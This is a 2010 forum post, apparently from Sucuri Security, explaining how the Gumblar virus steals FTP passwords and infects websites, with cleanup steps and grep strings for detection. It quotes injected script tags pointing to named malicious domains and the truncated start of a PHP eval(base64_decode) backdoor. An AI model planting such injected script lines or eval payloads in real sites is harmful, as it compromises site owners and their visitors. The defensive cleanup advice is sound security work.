begood Posted June 2, 2010 Report Posted June 2, 2010 If you have a web site and you want it to be secure, the first place you have protect is your desktop. Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop virus (generally called Gumblar, port 8080, etc). These virus steals your FTP password and does the following things:Infects all .js files on your site with entries like this one:document.write('<script src=http://wap.northernplumbingandheating.com/assets/postinfo.php');document.write('<script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php');It infects every .html files with entries similar to this:<script src=http://wap.northernplumbingandheating.com/assets/postinfo.php<script src=http://shopping-dubai.com/images/runActiveContent.php ><script src=http://stb-umhau.de/images/muffin35.php ><script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.phpEvery PHP file with a code similar to this one:<?php eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTF..And also creates backdoor files called gifimg.php on multiple directoriesNote that the domain changes every time and this is just a small list of them:http://stb-umhau.de/images/muffin35.phphttp://shopping-dubai.com/images/runActiveContent.phphttp://wap.northernplumbingandheating.cohttp://salsafestival-berlin.de/_fpclass/BannerWebseite2009.phphttp://applebe.dothome.co.kr/bbs/fla-3.phpHow to clean my desktop if I have this virus?Install an anti-virus and make sure it detected and removed the problem. If it didn't, try a different one Change your FTP passwords.Start using SFTP instead of FTPDo not store your FTP/SFTP password on your desktopHow to clean my site if it is infected?You can hire us to clean it up for you and monitor your sites going forward:Sucuri SecurityOr if you prefer to do yourself:Scan your site to see where the malware is and how it is called on your siteDownload your whole site to your desktopUse grep (or wingrep) and search for src=http, eval(base64_decode("aWRemove all those entries as well as the gifimg.php backdoorsRe-upload your site backThat should clean up your site. Note that it only applies to this type of virus (Gumblar or MW:JS:150), so if you have a different one, this clean up solution may not work completely.Sucuri Security: Web site security - It starts with your desktop Quote